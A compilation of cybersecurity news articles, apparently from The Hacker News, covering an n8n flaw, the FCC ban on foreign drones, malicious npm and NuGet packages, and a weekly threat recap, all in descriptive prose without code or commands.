A majority of the instances are located in the U.S., Germany, France, Brazil, and Singapore. In light of the criticality of the flaw, users are advised to apply the updates as soon as possible. If immediate patching is not an option, it’s advised to limit workflow creation and editing permissions to trusted users and deploy n8n in a hardened environment with restricted operating system privileges and network access to mitigate the risk. Found this article interesting?

FCC Bans Foreign-Made Drones and Key Parts Over U.S. National Security Risks

The U.S. Federal Communications Commission (FCC) on Monday announced a ban on all drones and critical components made in a foreign country, citing national security concerns. To that end, the agency has added to its Covered List Uncrewed aircraft systems (UAS) and UAS critical components produced in a foreign country, and all communications and video surveillance equipment and services pursuant to the 2025 National Defense Authorization Act ( NDAA ). This move will keep China-made drones such as those from DJI and Autel Robotics out of the U.S.

market. The FCC said that while drones offer the potential to enhance public safety and innovation, criminals, hostile foreign actors, and terrorists can weaponize them to present serious threats to the U.S. It also noted that a further review by an Executive Branch interagency body with appropriate national security expertise that was convened by the White House led to a “specific determination” that UAS and UAS critical component parts produced in foreign countries pose “unacceptable risks to the national security of the United States and to the safety and security of U.S. persons.” The decision, it said, is being taken to safeguard Americans and restore American airspace sovereignty as the country prepares to host several mass-gathering events in the coming years, including the 2026 FIFA World Cup and the 2028 Summer Olympics.

“UAS and UAS critical components must be produced in the United States,” the FCC said. “This will reduce the risk of direct UAS attacks and disruptions, unauthorized surveillance, sensitive data exfiltration, and other UAS threats to the homeland.” “UAS and UAS critical components, including data transmission devices, communications systems, flight controllers, ground control stations, controllers, navigation systems, batteries, smart batteries, and motors produced in a foreign country, could enable persistent surveillance, data exfiltration, and destructive operations over U.S. territory.” The FCC noted that specific drones or components would be exempt if the U.S. Department of Homeland Security (DHS) determined they did not pose such risks.

The ban, however, does not impact a consumer’s ability to continue using drones they previously purchased, nor prevent retailers from continuing to sell, import, or market device models that were approved by the government this year. The development comes a week after U.S. President Donald Trump signed into law the National Defense Authorization Act for Fiscal Year 2026, which includes provisions to secure airspace against unmanned aircraft when they present a threat to the public. In late July 2024, the Covered List was updated to include Russian cybersecurity company Kaspersky, preventing it from directly or indirectly offering its security software in the country.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Cybersecurity researchers have disclosed details of a new malicious package on the npm repository that works as a fully functional WhatsApp API, but also contains the ability to intercept every message and link the attacker’s device to a victim’s WhatsApp account. The package, named “ lotusbail ,” has been downloaded over 56,000 times since it was first uploaded to the registry by a user named “seiren_primrose” in May 2025. Of these, 711 downloads took place over the last week. The library is still available for download as of writing.

Under the cover of a functional tool, the malware “steals your WhatsApp credentials, intercepts every message, harvests your contacts, installs a persistent backdoor, and encrypts everything before sending it to the threat actor’s server,” Koi Security researcher Tuval Admoni said in a report published over the weekend. Specifically, it’s equipped to capture authentication tokens and session keys, message history, contact lists with phone numbers, as well as media files and documents. More significantly, the library is inspired by @whiskeysockets/baileys , a legitimate WebSockets-based TypeScript library for interacting with the WhatsApp Web API. This is accomplished by means of a malicious WebSocket wrapper through which authentication information and messages are routed, thereby allowing it to capture credentials and chats.

The stolen data is transmitted to an attacker-controlled URL in encrypted form. The attack doesn’t stop there, for the package also harbors covert functionality to create persistent access to the victim’s WhatsApp account by hijacking the device linking process by using a hard-coded pairing code. “When you use this library to authenticate, you’re not just linking your application – you’re also linking the threat actor’s device,” Admoni said. “They have complete, persistent access to your WhatsApp account, and you have no idea they’re there.” By linking their device to the target’s WhatsApp, it not only allows continued access to their contacts and conversations but also enables persistent access even after the package is uninstalled from the system, given the threat actor’s device remains linked to the WhatsApp account until it’s unlinked by navigating to the app’s settings.

Koi Security’s Idan Dardikman told The Hacker News that the malicious activity is triggered when the developer uses the library to connect to WhatsApp. “The malware wraps the WebSocket client, so once you authenticate and start sending/receiving messages, the interception kicks in,” Dardikman said. “No special function needed beyond normal usage of the API. The backdoor pairing code also activates during the authentication flow – so the attacker’s device gets linked the moment you connect your app to WhatsApp.” Furthermore, “lotusbail” comes fitted with anti-debugging capabilities that cause it to enter into an infinite loop trap when debugging tools are detected, causing it to freeze execution.

“Supply chain attacks aren’t slowing down – they’re getting better,” Koi said. “Traditional security doesn’t catch this. Static analysis sees working WhatsApp code and approves it. Reputation systems have seen 56,000 downloads, and trust it.

The malware hides in the gap between ‘this code works’ and ‘this code only does what it claims.’” Malicious NuGet Packages Target the Crypto Ecosystem The disclosure comes as ReversingLabs shared details of 14 malicious NuGet packages that impersonate Nethereum, a .NET integration library for the Ethereum decentralized blockchain, and other cryptocurrency-related tools to redirect transaction funds to attacker-controlled wallets when the transfer amount exceeded $100 or exfiltrate private keys and seed phrases. The names of the packages, published from eight different accounts, are listed below - binance.csharp bitcoincore bybitapi.net coinbase.net.api googleads.api nbitcoin.unified nethereumnet nethereumunified netherеum.all solananet solnetall solnetall.net solnetplus solnetunified The packages have leveraged several techniques to lull users into a false sense of trust in security, including inflating download counts and publishing dozens of new versions in a short amount of time to give the impression that it’s being actively maintained. The campaign dates all the way back to July 2025. The malicious functionality is injected such that it’s only triggered when the packages are installed by developers and specific functions are embedded into other applications.

Notable among the packages is GoogleAds.API, which focuses on stealing Google Ads OAuth information instead of exfiltrating wallet data secrets. “These values are highly sensitive, because they allow full programmatic access to a Google Ads account and, if leaked, attackers can impersonate the victim’s advertising client, read all campaign and performance data, create or modify ads, and even spend unlimited funds on a malicious or fraudulent campaign,” ReversingLabs said. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

⚡ Weekly Recap: Firewall Exploits, AI Data Theft, Android Hacks, APT Attacks, Insider Leaks & More

Cyber threats last week showed how attackers no longer need big hacks to cause big damage. They’re going after the everyday tools we trust most — firewalls, browser add-ons, and even smart TVs — turning small cracks into serious breaches. The real danger now isn’t just one major attack, but hundreds of quiet ones using the software and devices already inside our networks. Each trusted system can become an entry point if it’s left unpatched or overlooked.

Here’s a clear look at the week’s biggest risks, from exploited network flaws to new global campaigns and fast-moving vulnerabilities. ⚡ Threat of the Week Flaws in Multiple Network Security Products Come Under Attack — Over the past week, Fortinet , SonicWall , Cisco , and WatchGuard said vulnerabilities in their products have been exploited by threat actors in real-world attacks. Cisco said attacks exploiting CVE-2025-20393, a critical flaw in AsyncOS, have been abused by a China-nexus advanced persistent threat (APT) actor codenamed UAT-9686 to deliver malware such as ReverseSSH (aka AquaTunnel), Chisel, AquaPurge, and AquaShell. The flaw remains unpatched.

SonicWall said attacks exploiting CVE-2025-40602, a local privilege escalation flaw impacting Secure Mobile Access (SMA) 100 series appliances, have been observed in connection with CVE-2025-23006 (CVSS score 9.8) to achieve unauthenticated remote code execution with root privileges. The development comes as firewalls and edge appliances have become a favorite target for attackers, giving attackers deeper visibility into traffic, VPN connections, and downstream systems. Cyber Forum 2026: Adversary Trends, AI Innovation, and the Future of Security Ops A virtual cybersecurity forum for today’s security leaders. Discover how AI and automation strengthen defenses, streamline operations, and deliver measurable business impact.

Hear from security leaders and research experts and get actionable strategies and trends. Register for free today. Secure Your Seat ➝ 🔔 Top News Featured Chrome Extension Caught Harvesting AI Chats — Urban VPN Proxy, a Google Chrome and Microsoft Edge extension, with more than 7.3 installations, was observed stealthily gathering every prompt entered by users into artificial intelligence (AI)-powered chatbots like OpenAI ChatGPT, Anthropic Claude, Microsoft Copilot, DeepSeek, Google Gemini, xAI Grok, Meta AI, and Perplexity. Three other extensions from the same developer, 1ClickVPN Proxy, Urban Browser Guard, and Urban Ad Blocker, were also updated with similar functionality.

Collectively, these add-ons were installed more than eight million times. The extensions are no longer available for download from the Chrome Web Store. Ink Dragon Targets Governments with ShadowPad and FINALDRAFT — The threat actor known as Jewelbug (CL-STA-0049, Earth Alux, Ink Dragon, and REF7707) has been increasingly focusing on government targets in Europe since July 2025, even as it continues to attack entities located in Southeast Asia and South America. The campaign has “impacted several dozen victims, including government entities and telecommunications organizations, across Europe, Asia, and Africa.” Ink Dragon does not merely use victims for data theft but actively repurposes them to support ongoing operations against other targets of interest.

This creates a self-sustaining infrastructure that obscures the true origin of the attacks while maximizing the utility of every compromised asset. Kimwolf Botnet Hijacks 1.8 Million Android TVs — A new botnet named Kimwolf is powered by no less than 1.8 million Android TVs. Infections are scattered globally, with Brazil, India, the U.S., Argentina, South Africa, and the Philippines registering higher concentrations. Kimwolf is believed to share its origins with AISURU, which has been behind some of the record-breaking DDoS attacks over the past year.

It’s suspected that the attackers reused code from AISURU in the early stages, before opting to develop the Kimwolf botnet to evade detection. QiAnXin XLab said it’s possible some of these attacks may not have come from AISURU alone, and that Kimwolf may be either participating or even leading the efforts. LongNosedGoblin Uses Group Policy For Malware Deployment — A previously undocumented China-aligned threat cluster dubbed LongNosedGoblin has been attributed to a series of cyber attacks targeting governmental entities in Southeast Asia and Japan. Central to the group’s tradecraft is the abuse of Group Policy to deploy malware across the compromised network and cloud services for communication with infected endpoints using a backdoor dubbed NosyDoor.

The threat actor is believed to be active since at least September 2023. The exact initial access methods used in the attacks are presently unknown. Kimsuky Uses DocSwap Android Malware — The North Korean threat actor known as Kimsuky has been linked to a new campaign that distributes a new variant of Android data gathering malware called DocSwap via QR codes hosted on phishing sites mimicking Seoul-based logistics firm CJ Logistics (formerly CJ Korea Express). The apps masquerade as package delivery service apps.

It’s believed that the threat actors are using smishing texts or phishing emails impersonating delivery companies to deceive recipients into clicking on booby-trapped URLs hosting the apps. A noteworthy aspect of the attack is its QR code-based mobile redirection, which prompts users visiting the URLs from a desktop computer to scan a QR code displayed on the page on their Android device to install the supposed shipment tracking app and look up the status. ‎️‍🔥 Trending CVEs Hackers act fast. They can use new bugs within hours.

One missed update can cause a big breach. Here are this week’s most serious security flaws. Check them, fix what matters first, and stay protected. This week’s list includes — CVE-2025-14733 (WatchGuard), CVE-2025-11901, CVE-2025-14302, CVE-2025-14303, CVE-2025-14304 (pre-boot DMA protection Bypass), CVE-2025-37164 (HPE OneView Software), CVE-2025-59374 (ASUS Live Update), CVE-2025-20393 (Cisco AsyncOS), CVE-2025-40602 (SonicWall SMA 100 Series), CVE-2025-66430 (Plesk), CVE-2025-33213 (NVIDIA Merlin Transformers4Rec for Linux), CVE-2025-33214 (NVIDIA NVTabular for Linux), CVE-2025-54947 (Apache StreamPark), CVE-2025-13780 (pgAdmin), CVE-2025-34352 (JumpCloud Agent), CVE-2025-14265 (ConnectWise ScreenConnect), CVE-2025-40806, CVE-2025-40807 (Siemens Gridscale X Prepay), CVE-2025-32210 (NVIDIA Isaac Lab), CVE-2025-64374 (Motors WordPress theme), CVE-2025-64669 (Microsoft Windows Admin Center), CVE-2025-46295 (Apache Commons Text), CVE-2025-68154 (systeminformation), CVE-2025-14558 (FreeBSD), and cross-site scripting and information disclosure flaws in Roundcube Webmail (no CVEs).

📰 Around the Cyber World FBI Warns of Campaigns Impersonating Government Officials — The U.S. Federal Bureau of Investigation (FBI) has warned that malicious actors have impersonated senior U.S. state government, White House, and Cabinet-level officials, as well as members of Congress, to target individuals, including officials’ family members and personal acquaintances, since at least 2023. The “Malicious actors have sent text messages and AI-generated voice messages — techniques known as smishing and vishing, respectively — that claim to come from a senior U.S.

official to establish rapport with targeted individuals,” the FBI said . “In the scheme, actors contact an individual and briefly engage on a topic the victim is versed on, with a request to move communication to a secondary, encrypted mobile messaging application, happening almost immediately.” Once the conversation has shifted to Signal or WhatsApp, the threat actors urge victims to provide an authentication code that allows the actors to sync their device with the victim’s contact list, share Personally Identifiable Information (PII) and copies of sensitive personal documents, wire funds to an overseas financial institution under false pretenses, and request them to introduce the actor to a known associate. Noyb Files Complaint Against TikTok, AppsFlyer and Grindr — Austrian privacy non-profit noyb has filed complaints against TikTok, AppsFlyer, and Grindr, accusing the popular video sharing platform of unlawfully tracking users across apps in violation of GDPR laws in the region. “A user found out about this unlawful tracking practice through an access request – which showed that, e.g.

his usage of Grindr was sent to TikTok, likely via the Israeli tracking company AppsFlyer – which allows TikTok to draw conclusions about his sexual orientation and sex life,” noyb said. “TikTok initially even withheld this information from the user, which violates Article 15 GDPR. Only after repeated inquiries, TikTok revealed that it knows which apps he used, what he did within these apps (for example, adding a product to the shopping cart) - and that this data also included information about his usage of the gay dating app Grindr.” AuraStealer Spotted in the Wild — An emerging malware-as-a-service (MaaS) information stealer called AuraStealer has been distributed via Scam-Yourself campaigns, where victims are lured by TikTok videos disguised as product activation guides. “Viewers are instructed to manually retype and run a displayed command in an administrative PowerShell, which, however, instead of activating the software, quietly downloads and executes the malicious payload,” Gen Digital said .

“Apart from TikTok Scam-Yourself campaigns, AuraStealer is also distributed through supposedly cracked games or software, with delivery chains of varying complexity.” AuraStealer makes use of a long list of anti-analysis and obfuscation techniques, including indirect control flow obfuscation, string encryption, and exception-driven API hashing, to resist attempts to reverse engineer the malware. It’s capable of harvesting data from Chromium- and Gecko-based browsers, cryptocurrency wallets from desktop applications and browser extensions, clipboard contents, session tokens, credentials, VPNs, password managers, screenshots, and detailed system metadata. Also detected in the wild are two other information stealers named Stealka and Phantom , with the latter distributed via fake Adobe installers. Blind Eagle Continues to Attack Colombia — Colombian institutions have continued to face attacks from a threat actor known as Blind Eagle .

The latest phishing attacks, targeting agencies under the Ministry of Commerce, Industry and Tourism (MCIT), have shifted to a more sophisticated, multi-layer flow that uses an off-the-shelf loader named Caminho to deliver DCRat. The messages are sent from compromised email accounts within the same organization to bypass security checks. “The phishing email used a legal-themed design to lure the recipient,” Zscaler said . “The email was created to appear as an official message from the Colombian judicial system, referencing a labor lawsuit with an authentic-sounding case number and date.

The email pressures the recipient to confirm receipt immediately, leveraging authority, fear of legal consequences, and confidentiality warnings to trick the recipient into taking an action, namely opening the attachment.” Scripted Sparrow Linked to Large-Scale BEC Attacks — A sprawling Business Email Compromise (BEC) collective known as Scripted Sparrow has been observed distributing more than three million email messages each month and refining its social-engineering playbook. “The scale of the group’s operation strongly suggests the use of automation to generate and send their attack messages,” Fortra said . “The group utilizes a combination of free webmail addresses as well as addresses on domains they’ve registered specifically for their operations. The group operates by posing as various executive coaching and leadership training consultancies.” First discovered in June 2024, the “loose collective of fraudsters” has members located in Nigeria, South Africa, Türkiye, Canada, and the U.S.

The group is estimated to have registered 119 domains and used 245 webmail addresses. It has also used 256 bank accounts to move money out of victims’ bank accounts. Smart Devices Run Outdated Browser Versions — An academic study by a team of Belgian researchers has found that a majority of smart devices, such as smart TVs, e-readers, and gaming consoles, come with an embedded web browser that runs extremely outdated versions, sometimes as much as three years. All five e-readers that were tested, and 24 of 35 smart TV models, used embedded browsers that were at least three years behind current versions available to users of desktop computers.

These outdated, embedded browsers can leave users open to phishing and other security vulnerabilities. The authors said some of the issues lie in how development frameworks like Electron bundle browsers with other components. “We suspect that, for some products, this issue stems from the user-facing embedded browser being integrated with other UI components, making updates challenging – especially when bundled in frameworks like Electron, where updating the browser requires updating the entire framework,” they said in the paper. “This can break dependencies and increase development costs.” Denmark Blames Russia For Attack on Water Utility — The Danish Defence Intelligence Service (DDIS) has blamed Russia for recent destructive and disruptive cyber attacks against the country, including a water utility in 2024, as well as distributed denial-of-service (DDoS) attacks on Danish websites in the run-up to the 2025 municipal and regional council elections.

The attacks have been attributed to pro-Russian hacktivist groups Z-Pentest and NoName057(16), respectively. “The Russian state uses both groups as instruments of its hybrid war against the West. The aim is to create insecurity in the targeted countries and to punish those who support Ukraine,” the DDIS said. “Russia’s cyber operations form part of a broader influence campaign intended to undermine Western support for Ukraine.” The statement comes a few days after a global cybersecurity advisory warned that pro-Russian hacktivist groups conduct opportunistic attacks against US and global critical infrastructure.

Russia Targeted by Arcane Werewolf — Russian manufacturing companies have become the target of a threat actor known as Arcane Werewolf (aka Mythic Likho). Campaigns undertaken by the hacking group in October and November 2025 likely leveraged phishing emails as the initial access vector that presumably contained links to a malicious archive hosted on the attackers’ server. The links directed victims to a spoofed website imitating a Russian manufacturing company. The end goal of the attacks is to deploy a custom implant named Loki 2.1 by means of a loader that’s delivered using a Go-based dropper downloaded from an external server using PowerShell code embedded into a Windows shortcut (LNK) contained in the ZIP file.

In an attack chain detected in November 2025, a new C++ dropper was used to propagate the malware. Loki 2.1 is equipped to upload/download files, inject code into a target process, terminate arbitrary processes, retrieve environment variables, and stop its own execution. RansomHouse Upgrades to Complex Encryption — The RansomHouse (aka Jolly Scorpius) ransomware group has upgraded its file encryption process to use two different encryption keys to encrypt files as part of their attacks in what has been described as a significant escalation and “concerning trajectory” in ransomware development. “The upgraded version’s code reveals a two-factor encryption scheme where the file is encrypted with both a primary key and a secondary key.

Data encryption is processed separately for each key,” Palo Alto Networks Unit 42 said . “This significantly increases the difficulty of decrypting the data without both keys.” The e-crime group has been active since December 2021, listing 123 victims on its data leak site. Central to the threat actor’s operations is a tool called MrAgent that provides attackers with persistent access to a victim’s environment and simplifies managing compromised hosts at scale. It’s also responsible for deploying Mario to encrypt critical VM files in the ESXi hypervisor.

LLMs and Ransomware Lifecycle — The emergence of large language models (LLMs) is likely accelerating the ransomware lifecycle, according to new findings from SentinelOne. “We observe measurable gains in speed, volume, and multilingual reach across reconnaissance, phishing, tooling assistance, data triage, and negotiation, but no step-change in novel tactics or techniques driven purely by AI at scale,” the company said. LLMs, including those that are deployed locally, can be used to replace the manual effort associated with drafting phishing emails and localized content, search for sensitive data, and develop malicious code. The continued sightings of various dark LLMs show that criminals are gravitating toward uncensored models that allow them to evade guardrails.

“Actors already chunk malicious code into benign prompts across multiple models or sessions, then assemble offline to dodge guardrails,” SentinelOne said . “This workflow will become commoditized as tutorials and tooling proliferate, ultimately maturing into ‘prompt smuggling as a service.’” The findings signal that the barrier to entry into cybercrime continues to drop, even as the ransomware ecosystem is splintering and the line between nation-state and crimeware activity is increasingly blurring. The use of the technology is also likely to blur existing assessment lines around tradecraft and attribution, owing to the fact that the capabilities even allow smaller groups to acquire capabilities that were once limited to advanced state-backed actors. TikTok Signs Agreement to Create New U.S.

Joint Venture — Nearly a year after TikTok’s operations were briefly banned in the U.S. for national security concerns, the popular video-sharing platform said it has finalized a deal to move a substantial portion of its U.S. business under a new joint venture named TikTok USDS Joint Venture LLC. According to reports from Axios , Bloomberg , CNBC , and The Hollywood Reporter , the company has signed agreements with the three managing investors: Oracle, Silver Lake, and Abu Dhabi-based MGX.

Together, those companies will own 45% of the U.S. operation, while ByteDance retains a nearly 20% share. The new entity is said to be responsible for protecting U.S. data, ensuring the security of its prized algorithm, content moderation, and “software assurance.” Oracle will be the trusted security partner in charge of auditing and validating compliance.

The agreement is set to go into effect on January 22, 2026. Under a national security law, China-based ByteDance was required to divest TikTok’s U.S. operations or face an effective ban in the country. The U.S.

government has since extended the ban four times as a deal was being hatched behind the scenes. Under President Donald Trump’s executive order in September, the attorney general was blocked from enforcing the national security law for a 120-day period in order to “permit the contemplated divestiture to be completed,” allowing the deal to finalize by January 23, 2026. Android Adware Campaign Targets East and Southeast Asia — Android users in the Philippines, Pakistan, and Malaysia have been targeted by a large-scale Android adware campaign dubbed GhostAd that silently drains resources and disrupts normal phone use through persistent background activity. The set of 15 apps, distributed via Google Play, masqueraded as harmless utility and emoji-editing tools such as Vivid Clean and GenMoji Studio.

“Behind their cheerful icons, these apps created a persistent background advertising engine – one that kept running even after users closed or rebooted their devices, quietly consuming battery and mobile data,” Check Point said . “GhostAd integrates multiple legitimate advertising software development kits (SDKs), including Pangle, Vungle, MBridge, AppLovin, and BIGO, but uses them in a way that violates fair-use policies. Instead of waiting for user interaction, the apps continuously load, queue, and refresh ads in the background, using Kotlin coroutines to sustain the cycle.” The apps have since been removed by Google, but not before they amassed millions of downloads. Texas Sues TV Makers for Spying on Owners — Texas Attorney General Ken Paxton accused Sony, Samsung, LG, Hisense, and TCL of spying on their customers and illegally collecting their data by using automatic content recognition ( ACR ), according to a new lawsuit.

“ACR in its simplest terms is an uninvited, invisible digital invader,” Paxton said . “This software can capture screenshots of a user’s television display every 500 milliseconds, monitor viewing activity in real time, and transmit that information back to the company without the user’s knowledge or consent. This conduct is invasive, deceptive, and unlawful.” Cybercriminals Entice Insiders with High Payouts — Check Point has called attention to dark web posts that aim to recruit insiders within organizations to gain access to corporate networks, user devices, and cloud environments. The activity targets the financial sector and cryptocurrency firms, as well as companies like Accenture, Genpact, Netflix, and Spotify.

The ads offer payouts from $3,000 to $15,000 for access or data. “Across darknet forums, employees are being approached, or even volunteering, to sell access or sensitive information for lucrative rewards,” the company said . When internal staff disable defenses, leak credentials, or provide privileged information, preventing an attack becomes exponentially harder. Monitoring the deep web and darknet for organizational mentions or stolen data is now as critical as deploying advanced cyber prevention technologies.” Flaws in Anno 1404 Game — Synacktiv researchers have disclosed multiple vulnerabilities in a strategy game named Anno 1404 that, if chained together, allow for arbitrary code execution from within the multiplayer mode.

JSCEAL Campaign Undergoes a Shift — A Facebook ads campaign that’s used to distribute a compiled V8 JavaScript (JSC) malware called JSCEAL has evolved into a more sophisticated form, with the attackers adopting a revamped command-and-control (C2) infrastructure, enhanced anti-analysis safeguards, and an updated script engine designed for increased stealth. “In contrast to the 1H 2025 campaign, which relied primarily on .com domains, the August 2025 campaign includes a broader variety of top-level domains such as .org, .link, .net, and others,” Cato Networks said . “These domains are registered in bulk at regular intervals, suggesting an automated, scalable provisioning workflow.” What’s more, the updated infrastructure enforces stricter filtering and anti-analysis controls, blocking any HTTP request that does not present a PowerShell User-Agent. In the event a request includes the correct PowerShell User-Agent, the server responds with a fake PDF error rather than delivering the actual payload.

It’s only after the PDF has been returned that the C2 server delivers the next stage, including a modified version of the ZIP file containing the stealer malware. Third Defendant Pleads Guilty to Hacking Fantasy Sports and Betting Website — Nathan Austad, 21, of Farmington, Minnesota, has pleaded guilty in connection with a scheme to hack thousands of user accounts at an unnamed fantasy sports and betting website and sell access to those accounts with the goal of stealing hundreds of thousands of dollars from users. Austad and others launched a credential stuffing attack on the website in November 2022 and fully compromised approximately 60,000 user accounts. “In some instances, Austad and his co-conspirators were able to add a new payment method of their own on the account (i.e., to a newly added financial account belonging to the hacker) and then use it to withdraw all the existing funds in the victim account to themselves, thus stealing the funds in each affected Victim Account,” the U.S.

Justice Department said. “Using this method, Austad and others stole approximately $600,000 from approximately 1,600 victim accounts on the Betting Website.” Access to the victim accounts was then sold on various websites that traffic in stolen accounts. Drop in Critical CVEs in 2025 — The number of critical vulnerabilities flagged in 2025 is at 3,753, down from 4,629 in 2023 and 4,283 in 2024, even as the total number of CVEs has increased to more than 40,000. According to VulnCheck, about 25.9% of the 43,002 CVEs published in 2025 have been enriched with a CVSS v4 score.

“What this ultimately suggests is that CVSS v4 adoption is constrained not by lack of availability, but by limited participation from some of the largest and most influential CVE publishers and enrichers,” it said . “Commonly cited reasons include resource constraints, required tooling changes, and a perception that CVSS v4 provides limited additional value while increasing scoring complexity and operational overhead.” Amadey Uses Self-Hosted GitLab Instance to Distribute StealC — A new Amadey malware loader campaign has leveraged an exploited self-hosted GitLab instance (“gitlab.bzctoons[.]net”) to deliver the StealC infostealer. “This analysis reveals how threat actors are hijacking abandoned, self-hosted GitLab servers to create a legitimate-looking payload distribution infrastructure,” Trellix said . “The use of a long-standing domain with valid TLS certificates provides an effective evasion technique against traditional security controls.” While the domain appears to belong to a small-scale organization hosting GitLab with multiple users, evidence suggests that either the user account or the entire infrastructure has been compromised.

U.S. Dismantle E-Note Cryptocurrency Exchange — U.S. authorities seized the servers and infrastructure of the E-Note cryptocurrency exchange (“e-note.com,” “e-note.ws,” and “jabb.mn”) for allegedly laundering more than $70 million from ransomware attacks and account takeover attacks since 2017. No arrests have been announced.

In tandem, authorities have also indicted the site’s operator, a 39-year-old Russian national named Mykhalio Petrovich Chudnovets, who is said to have started offering money laundering services to cybercriminals in 2010. Chudnovets has been charged with one count of conspiracy to launder monetary instruments, which carries a maximum penalty of 20 years in prison. The takedown fits into a broader law enforcement effort aimed at taking down services that allow bad actors to abuse the financial system and cash out the ill-gotten proceeds. 🎥 Cybersecurity Webinars How Zero Trust and AI Catch Attacks With No Files, No Binaries, and No Indicators — Cyber threats are evolving faster than ever, exploiting trusted tools and fileless techniques that evade traditional defenses.

This webinar reveals how Zero Trust and AI-driven protection can uncover unseen attacks, secure developer environments, and redefine proactive cloud security—so you can stay ahead of attackers, not just react to them. Master Agentic AI Security: Learn to Detect, Audit, and Contain Rogue MCP Servers — AI tools like Copilot and Claude Code help developers move fast, but they can also create big security risks if not managed carefully. Many teams don’t know which AI servers (MCPs) are running, who built them, or what access they have. Some have already been hacked, turning trusted tools into backdoors.

This webinar shows how to find hidden AI risks, stop shadow API key problems, and take control before your AI systems create a breach. 🔧 Cybersecurity Tools Tracecat — It is an open-source automation platform designed for security and IT teams that need flexible, scalable workflow orchestration. It combines simple YAML-based integration templates with a no-code interface for building workflows, along with built-in lookup tables and case management. Under the hood, workflows are orchestrated using Temporal to support reliability and scale, making Tracecat suitable for both local experimentation and production environments.

Metis — It is an open-source, AI-powered security code review tool built by Arm’s Product Security Team. It uses large language models to understand code context and logic, helping engineers find subtle security issues that traditional tools often miss. Metis supports multiple languages through plugins, works with different LLM providers, and is designed to reduce review fatigue in large or complex codebases while improving secure coding practices. Disclaimer: These tools are for learning and research only.

They haven’t been fully tested for security. If used the wrong way, they could cause harm. Check the code first, test only in safe places, and follow all rules and laws. Conclusion The past week made one point clear: the perimeter is gone, but accountability isn’t.

Every device, app, and cloud service now plays a part in defense. Patching fast, verifying what’s running, and questioning defaults are no longer maintenance tasks — they’re survival skills. As threats grow more adaptive, resilience comes from awareness and speed, not fear. Keep visibility high, treat every update as risk reduction, and remember that most breaches start with something ordinary left unchecked.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

2025-12-25 AI创业新闻

New MacSync macOS Stealer Uses Signed App to Bypass Apple Gatekeeper

Nomani Investment Scam Surges 62% Using AI Deepfake Ads on Social Media

Attacks are Evolving: 3 Ways to Protect Your Business in 2026

SEC Files Charges Over $14 Million Crypto Scam Using Fake AI-Themed Investment Tips

Italy Fines Apple €98.6 Million Over ATT Rules Limiting App Store Competition

How AI and Zero Trust Work Together to Catch Attacks With No Files or Indicators

Two Chrome Extensions Caught Secretly Stealing Credentials from Over 170 Sites

INTERPOL Arrests 574 in Africa; Ukrainian Ransomware Affiliate Pleads Guilty

Passwd: A walkthrough of the Google Workspace Password Manager

U.S. DoJ Seizes Fraud Domain Behind $14.6 Million Bank Account Takeover Scheme

Critical n8n Flaw (CVSS 9.9) Enables Arbitrary Code Execution Across Thousands of Instances

FCC Bans Foreign-Made Drones and Key Parts Over U.S. National Security Risks

Fake WhatsApp API Package on npm Steals Messages, Contacts, and Login Tokens

⚡ Weekly Recap: Firewall Exploits, AI Data Theft, Android Hacks, APT Attacks, Insider Leaks & More